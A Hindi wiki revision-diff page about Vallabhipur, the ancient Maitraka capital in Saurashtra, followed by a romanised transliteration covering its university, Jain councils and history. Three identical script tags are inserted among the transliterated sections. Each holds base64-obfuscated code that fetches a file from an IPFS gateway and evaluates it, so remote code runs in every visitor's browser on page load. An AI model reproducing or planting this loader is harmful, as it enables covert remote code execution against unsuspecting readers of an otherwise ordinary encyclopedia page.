Difference between revisions of "बल्लभीपुर गुजरात"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " सदी " to " सदी ")
Line 1: Line 1:
बल्लभीपुर वल्लभीपुर भी कहलाता है। बल्लभीपुर प्राचीन [[भारत]] का एक नगर है, जो पाँचवीं से आठवीं शताब्दी तक मैत्रक वंश की राजधानी रहा। यह पश्चिमी [[भारत]] के [[सौराष्ट्र]] में और बाद में [[गुजरात]] राज्य, [[भावनगर]] के बंदरगाह के पश्चिमोत्तर में [[खम्भात की खाड़ी]] के मुहाने पर स्थित था।  
+
'''बल्लभीपुर''' अथवा 'वल्लभीपुर' [[भारत]] के प्राचीन नगरों में से एक है, जो पाँचवीं से आठवीं शताब्दी तक 'मैत्रक वंश' की राजधानी रहा था। यह [[पश्चिमी भारत]] के [[सौराष्ट्र]] में और बाद में [[गुजरात]] राज्य, [[भावनगर]] के बंदरगाह के पश्चिमोत्तर में '[[खम्भात की खाड़ी]]' के मुहाने पर स्थित था। 770 ई. के पूर्व यह नगर भारत में काफ़ी प्रसिद्ध था। प्राचीन समय में यहाँ 'वल्लभी विश्वविद्यालय' हुआ करता था, जो [[तक्षशिला]] तथा [[नालन्दा]] की परम्परा में था। इस स्थान से मैत्रकों राजाओं के [[ताँबा|ताँबे]] के [[अभिलेख]] और मुद्राएँ आदि पाई गई हैं।
==स्थापना==
+
{{tocright}}
माना जाता है कि इसकी स्थापना लगभग 470 ई. में मैत्रक वंश के संस्थापक सेनापति भट्टारक ने की थी। यह वह काल था, जब गुप्त साम्राज्य का विखण्डन हो रहा। वल्लभी लगभग 780 ई. तक राजधानी बना रहा, फिर अचानक इतिहास के पन्नों से अदृश्य हो गया। ऐसा प्रतीत होता है कि लगभग 725-735 में सौराष्ट्र पर हुए अरब आक्रमणों से यह बच गया था।
 
 
==इतिहास==
 
==इतिहास==
वल्लभी ज्ञान का महत्त्वपूर्ण केन्द्र था और यहाँ कई [[बौद्ध मठ]] भी थे। यहाँ सातवीं [[सदी]] के मध्य में चीनी यात्री [[ह्वेन त्सांग]] और अन्त में आईचिन आए थे। जिन्होंने इसकी तुलना [[बिहार]] के [[नालन्दा]] से की थी। एक जैन परम्परा के अनुसार पाँचवीं या छठी शताब्दी में दूसरी जैन परिषद् वल्लभी में आयोजित की गई थी। इसी परिषद् में [[जैन]] ग्रन्थों ने वर्तमान स्वरूप ग्रहण किया था। यह नगर अब लुप्त हो चुका है, लेकिन वल नामक गाँव से इसकी पहचान की गई है, जहाँ मैत्रकों के ताँबे के अभिलेख और मुद्राएँ पाई गई हैं।
+
माना जाता है कि वल्लभी की स्थापना लगभग 470 ई. में मैत्रक वंश के संस्थापक सेनापति भट्टारक ने की थी। यह वह काल था, जब [[गुप्त साम्राज्य]] का विखण्डन हो रहा था और साम्राज्य पतन की ओर अग्रसर था। वल्लभी लगभग 780 ई. तक राजधानी बना रहा, फिर अचानक [[इतिहास]] के पन्नों से अदृश्य हो गया। ऐसा प्रतीत होता है कि लगभग 725-735 में [[सौराष्ट्र]] पर हुए अरबों के आक्रमणों से यह बच गया था।
{{tocright}}
+
====विद्या का केन्द्र====
प्राचीन काल में यह राज्य गुजरात के प्रायद्वीपीय भाग में स्थित था। वर्तमान समय में इसका नाम वला नामक भूतपूर्व रियासत तथा उसके मुख्य स्थान वलभी के नाम में सुरक्षित रह गया है। 770 ई. के पूर्व यह देश [[भारत]] में विख्यात था। यहाँ की प्रसिद्धी का कारण वल्लभी विश्वविद्यालय था जो [[तक्षशिला]] तथा नालन्दा की परम्परा में था। वल्लभीपुर या वलभि से यहाँ के शासकों के उत्तरगुप्तकालीन अनेक अभिलेख प्राप्त हुए हैं। [[बुंदेल|बुंदेलों]] के परम्परागत इतिहास से सूचित होता है कि वल्लभीपुर की स्थापना उनके पूर्वपुरुष कनकसेन ने की थी जो श्री [[राम|रामचन्द्र]] के पुत्र [[लव कुश|लव]] का वंशज था। इसका समय 144 ई. कहा जाता है।
+
तत्कालीन समय में वल्लभी ज्ञान का महत्त्वपूर्ण केन्द्र था। यहाँ कई पाठशालाएँ और [[बौद्ध मठ]] भी थे। यहाँ सातवीं [[सदी]] के मध्य में चीनी यात्री [[ह्वेन त्सांग]] और अन्त में आईचिन आए थे, जिन्होंने इसकी तुलना [[बिहार]] के [[नालन्दा]] से की थी। एक [[जैन]] परम्परा के अनुसार पाँचवीं या छठी शताब्दी में दूसरी जैन परिषद वल्लभी में आयोजित की गई थी। इसी परिषद में [[जैन]] ग्रन्थों ने वर्तमान स्वरूप ग्रहण किया था। यह नगर अब लुप्त हो चुका है, लेकिन 'वल' नामक गाँव से इसकी पहचान की गई है, जहाँ मैत्रकों के ताँबे के अभिलेख और मुद्राएँ पाई गई हैं।
 +
==प्रसिद्धि==
 +
प्राचीन काल में वल्लभी [[गुजरात]] के प्रायद्वीपीय भाग में स्थित था। वर्तमान समय में इसका नाम 'वला' नामक भूतपूर्व रियासत तथा उसके मुख्य स्थान 'वलभी' के नाम में सुरक्षित रह गया है। 770 ई. के पूर्व यह देश [[भारत]] में विख्यात था। यहाँ की प्रसिद्धी का कारण 'वल्लभी विश्वविद्यालय' था, जो [[तक्षशिला]] तथा [[नालन्दा]] की परम्परा में था। वल्लभीपुर या वलभि से यहाँ के शासकों के उत्तर गुप्तकालीन अनेक [[अभिलेख]] प्राप्त हुए हैं। [[बुन्देला|बुंदेलों]] के परम्परागत इतिहास से सूचित होता है कि वल्लभीपुर की स्थापना उनके पूर्वपुरुष कनकसेन ने की थी, जो [[रामचन्द्र]] के पुत्र [[लव कुश|लव]] का वंशज था। इसका समय 144 ई. कहा जाता है।
 +
==जैन परिषद का आयोजन==
 +
जैन अनुश्रुति के अनुसार [[जैन धर्म]] की तीसरी परिषद वल्लभीपुर में आयोजित हुई थी, जिसके अध्यक्ष देवर्धिगणि नामक आचार्य थे। इस परिषद के द्वारा प्राचीन जैन आगमों का सम्पादन किया गया था। जो संग्रह सम्पादित हुआ, उसकी अनेक प्रतियाँ बनाकर [[भारत]] के बड़े-बड़े नगरों में सुरक्षित कर दी गई थी। यही परिषद छठी शती ई. में हुई थी। जैन ग्रन्थ 'विविधतीर्थकल्प' के अनुसार वल्लभी गुजरात की परम वैभवशाली नगरी थी। वलभि नरेश शीलादित्य ने 'रंकज' नामक एक धनी व्यापारी का अपमान किया था, जिसने [[अफ़ग़ानिस्तान]] के अमीर या हम्मीर को शीलादित्य के विरुद्ध भड़का कर आक्रमण करने के लिए निमंत्रित किया था। इस युद्ध में शीलादित्य मारा गया था।
  
==अनुश्रुति के अनुसार==
+
{{लेख प्रगति |आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध=}}
जैन अनुश्रुति के अनुसार जैन धर्म की तीसरी परिषद् वल्लभीपुर में हुई थी, जिसके अध्यक्ष देवर्धिगणि नामक आचार्य थे। इस परिषद् के द्वारा प्राचीन जैन आगमों का सम्पादन किया गया था। जो संग्रह सम्पादित हुआ उसकी अनेक प्रतियाँ बनाकर [[भारत]] के बड़े-बड़े नगरों में सुरक्षित कर दी गई थी। यही परिषद् छठी शती ई. में हुई थी। जैन ग्रन्थ विविध तीर्थ कल्प के अनुसार वलभि गुजरात की परम वैभवशाली नगरी थी। वलभि नरेश शीलादित्य ने रंकज नामक एक धनी व्यापारी का अपमान किया था, जिसने [[अफ़ग़ानिस्तान]] के अमीर या हम्मीरय को शीलादित्य के विरुद्ध भड़का कर आक्रमण करने के लिए निमंत्रित किया था। इस युद्ध में शीलादित्य मारा गया था।
 
{{लेख प्रगति  
 
|आधार=
 
|प्रारम्भिक= प्रारम्भिक1
 
|माध्यमिक=  
 
|पूर्णता=  
 
|शोध=
 
}}
 
 
==संबंधित लेख==
 
==संबंधित लेख==
{{गुजरात के पर्यटन स्थल}}
+
{{गुजरात के ऐतिहासिक स्थान}{{गुजरात के पर्यटन स्थल}}{{गुजरात के नगर}}
{{गुजरात के नगर}}
+
[[Category:गुजरात]][[Category:गुजरात_के_ऐतिहासिक_नगर]][[Category:भारत के नगर]][[Category:गुजरात_के_नगर]][[Category:गुजरात_के_ऐतिहासिक_स्थान]][[Category:ऐतिहासिक स्थान कोश]][[Category:इतिहास कोश]]
[[Category:भारत के नगर]]
+
__INDEX__
[[Category:गुजरात]][[Category:गुजरात_के_ऐतिहासिक_नगर]][[Category:गुजरात_के_ऐतिहासिक_स्थान]][[Category:गुजरात_के_नगर]]__INDEX__
 

Revision as of 09:40, 20 July 2013

ballabhipur athava 'vallabhipur' bharat ke prachin nagaroan mean se ek hai, jo paanchavian se athavian shatabdi tak 'maitrak vansh' ki rajadhani raha tha. yah pashchimi bharat ke saurashtr mean aur bad mean gujarat rajy, bhavanagar ke bandaragah ke pashchimottar mean 'khambhat ki kha di' ke muhane par sthit tha. 770 ee. ke poorv yah nagar bharat mean kafi prasiddh tha. prachin samay mean yahaan 'vallabhi vishvavidyalay' hua karata tha, jo takshashila tatha nalanda ki parampara mean tha. is sthan se maitrakoan rajaoan ke taanbe ke abhilekh aur mudraean adi paee gee haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

itihas

mana jata hai ki vallabhi ki sthapana lagabhag 470 ee. mean maitrak vansh ke sansthapak senapati bhattarak ne ki thi. yah vah kal tha, jab gupt samrajy ka vikhandan ho raha tha aur samrajy patan ki or agrasar tha. vallabhi lagabhag 780 ee. tak rajadhani bana raha, phir achanak itihas ke pannoan se adrishy ho gaya. aisa pratit hota hai ki lagabhag 725-735 mean saurashtr par hue araboan ke akramanoan se yah bach gaya tha.

vidya ka kendr

tatkalin samay mean vallabhi jnan ka mahattvapoorn kendr tha. yahaan kee pathashalaean aur bauddh math bhi the. yahaan satavian sadi ke madhy mean chini yatri hven tsaang aur ant mean aeechin ae the, jinhoanne isaki tulana bihar ke nalanda se ki thi. ek jain parampara ke anusar paanchavian ya chhathi shatabdi mean doosari jain parishad vallabhi mean ayojit ki gee thi. isi parishad mean jain granthoan ne vartaman svaroop grahan kiya tha. yah nagar ab lupt ho chuka hai, lekin 'val' namak gaanv se isaki pahachan ki gee hai, jahaan maitrakoan ke taanbe ke abhilekh aur mudraean paee gee haian.

prasiddhi

prachin kal mean vallabhi gujarat ke prayadvipiy bhag mean sthit tha. vartaman samay mean isaka nam 'vala' namak bhootapoorv riyasat tatha usake mukhy sthan 'valabhi' ke nam mean surakshit rah gaya hai. 770 ee. ke poorv yah desh bharat mean vikhyat tha. yahaan ki prasiddhi ka karan 'vallabhi vishvavidyalay' tha, jo takshashila tatha nalanda ki parampara mean tha. vallabhipur ya valabhi se yahaan ke shasakoan ke uttar guptakalin anek abhilekh prapt hue haian. buandeloan ke paramparagat itihas se soochit hota hai ki vallabhipur ki sthapana unake poorvapurush kanakasen ne ki thi, jo ramachandr ke putr lav ka vanshaj tha. isaka samay 144 ee. kaha jata hai.

jain parishad ka ayojan

jain anushruti ke anusar jain dharm ki tisari parishad vallabhipur mean ayojit huee thi, jisake adhyaksh devardhigani namak achary the. is parishad ke dvara prachin jain agamoan ka sampadan kiya gaya tha. jo sangrah sampadit hua, usaki anek pratiyaan banakar bharat ke b de-b de nagaroan mean surakshit kar di gee thi. yahi parishad chhathi shati ee. mean huee thi. jain granth 'vividhatirthakalp' ke anusar vallabhi gujarat ki param vaibhavashali nagari thi. valabhi naresh shiladity ne 'rankaj' namak ek dhani vyapari ka apaman kiya tha, jisane afaganistan ke amir ya hammir ko shiladity ke viruddh bh daka kar akraman karane ke lie nimantrit kiya tha. is yuddh mean shiladity mara gaya tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

{{gujarat ke aitihasik sthan}

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>